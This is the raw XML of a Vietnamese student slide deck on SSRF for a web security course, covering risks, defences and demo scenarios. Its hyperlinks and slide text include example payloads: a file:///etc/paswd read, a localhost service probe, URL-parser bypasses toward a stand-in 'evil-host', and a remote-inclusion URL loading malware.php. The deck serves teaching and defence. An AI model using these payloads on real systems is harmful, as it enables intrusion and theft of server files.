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embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Roboto Slab"/>
      <p:regular r:id="rId22"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Slab"/>
      <p:regular r:id="rId23"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto"/>
      <p:regular r:id="rId24"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto"/>
      <p:regular r:id="rId25"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto"/>
      <p:regular r:id="rId26"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto"/>
      <p:regular r:id="rId2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hyperlink" Target="http://ASP.NET" TargetMode="External"/><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file:///etc/paswd" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:28017/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://expected-host:fakepassword@evil-host" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://evil-host#expected-host" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://expected-host.evil-host" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/load.php?file=about.html" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/load.php?file=http://malicious.com/malware.php" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image-14-1.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image-14-2.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout15.xml"/><Relationship Id="rId11"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hyperlink" Target="http://viblo.asia" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://portswigger.net" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp.org" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout16.xml"/><Relationship Id="rId5"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businessinsights.bitdefender.com/technical-advisory-proxyhell-exploit-chains-in-the-wild"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portswigger.net/web-security/ssrf" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image-6-1.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owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/" TargetMode="External"/><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83488" y="2884884"/>
            <a:ext cx="4919424" cy="2459712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6280190" y="1637109"/>
            <a:ext cx="7556421" cy="978218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="7700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Báo cáo đồ án</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6280190" y="2955488"/>
            <a:ext cx="7556421" cy="907018"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="3550"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFA44F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Môn học: Bảo mật web và ứng dụng</a:t>
            </a:r>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="3550"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="3550"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFA44F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Đề tài: Side-server Request Forgery (SSRF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6280190" y="4117657"/>
            <a:ext cx="7556421" cy="362903"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>GVHD: ThS. Nguyễn Công Danh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6280190" y="4820722"/>
            <a:ext cx="4699278" cy="1771650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>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Nhóm 08</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
</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22520028 - Phạm Trường Thiên Ân</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
</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22520132 - Nguyễn Hữu Bình</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
</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22520199 - Lê Công Danh</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
</a:t>
            </a:r>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22520633 - Hồ Vỉ Khánh</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841903"/>
            <a:ext cx="5670590"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3. Mục tiêu đồ án</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="4094917"/>
            <a:ext cx="3978116"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a) Hiểu rõ cách thức hoạt động SSRF, xác định nguyên nhân, các nguy cơ, rủi ro khi bị tấn công SSRF.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5332928" y="4094917"/>
            <a:ext cx="3978116"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b) Xây dựng các biện pháp bảo vệ các cuộc tấn công SSRF.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9872067" y="4094917"/>
            <a:ext cx="3978116"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c) Đánh giá một số hệ thống thực tế.</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384816"/>
            <a:ext cx="8173641" cy="566976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="4450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3550" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="76B9FF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>a) Nguy cơ, rủi ro khi bị tấn công SSRF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="2405420"/>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Nếu kẻ tấn công có thể kiểm soát đích của các yêu cầu phía máy chủ, chúng có thể thực hiện các hành động sau:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="302347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Lạm dụng mối quan hệ tin cậy giữa máy chủ dễ bị tổn thương và những người khác.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="346567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Bỏ qua danh sách trắng.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="390786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Bỏ qua dịch vụ xác thực dựa trên máy chủ.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="4350068"/>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Đọc tài nguyên mà công chúng không thể truy cập, chẳng hạn như trace.axd trong </a:t>
            </a:r>
            <a:pPr algn="l"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ASP.NET</a:t>
            </a:r>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 hoặc siêu dữ liệu API trong môi trường AWS.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="515516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Quét mạng nội bộ mà máy chủ được kết nối đến.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="559736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Đọc tệp từ máy chủ.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="6039564"/>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Xem trang trạng thái và tương tác với các API như máy chủ web.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="648176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Truy xuất thông tin nhạy cảm như địa chỉ IP của máy chủ web sau proxy ngược.</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994297"/>
            <a:ext cx="12293084" cy="566976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="4450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3550" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="76B9FF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>b) Xây dựng các biện pháp bảo vệ các cuộc tấn công SSRF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="301490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Kiểm tra đầu vào cẩn thận: Luôn kiểm tra và xác thực kĩ lưỡng bất kỳ đầu vào nào từ phía client liên quan đến URL hoặc địa chỉ IP. Chỉ cho phép các IP từ whitelist.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="382000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Giới hạn quyền truy cập: Giới hạn khả năng truy cập từ máy chủ đến các tài nguyên nội bộ và các dịch vụ không cần thiết. Sử dụng tường lửa để ngăn chặn các yêu cầu đến các địa chỉ nội bộ.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="4625102"/>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Sử dụng WAF: Web Application Firewall (WAF) có thể phát hiện và chặn các yêu cầu độc hại có dấu hiệu tấn công SSRF.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="506730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Giới hạn chức năng máy chủ: Cấu hình máy chủ để giới hạn những loại yêu cầu có thể gửi đi.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="5509498"/>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Tách biệt các dịch vụ: Đảm bảo rằng các dịch vụ quan trọng không được truy cập dễ dàng từ các dịch vụ khác, ngay cả khi cùng nằm trong một hệ thống. </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558415"/>
            <a:ext cx="8969812"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5. Phương pháp dự tính thực hiện</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="3811429"/>
            <a:ext cx="2845594"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Nghiên cứu tài liệu: PortSwigger, owasp, Snyk Learn, Zenarmor…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="5104209"/>
            <a:ext cx="2845594"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5" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4200406" y="3811429"/>
            <a:ext cx="2845594"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Phân tích thực tế 1 vài trang web.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7607022" y="3811429"/>
            <a:ext cx="2845594"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Xây dựng kịch bản demo.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11013638" y="3811429"/>
            <a:ext cx="2845594"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Đánh giá các kịch bản và tìm giải pháp.</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07194" y="319921"/>
            <a:ext cx="2909292" cy="363736"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="76B9FF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>6. Kịch bản demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="407194" y="962858"/>
            <a:ext cx="3241119" cy="186095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5E98F1"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Kịch bản 1:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="407194" y="1253609"/>
            <a:ext cx="3241119" cy="558284"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Dữ liệu nhạy cảm bị phơi bày - Kẻ tấn công có thể truy cập tới tệp tin cục bộ hoặc dịch vụ nội bộ để lấy thông tin nhạy cảm như tệp </a:t>
            </a:r>
            <a:pPr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file:///etc/paswd</a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> và </a:t>
            </a:r>
            <a:pPr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http://localhost:28017/</a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3939778" y="962858"/>
            <a:ext cx="3241119" cy="186095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5E98F1"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Kịch bản 2:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3939778" y="1253609"/>
            <a:ext cx="3241119" cy="372189"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Sửa đổi dữ liệu từ việc URL cho phép nhúng thông tin xác thực người dùng: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3939778" y="1730454"/>
            <a:ext cx="3241119" cy="372189"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
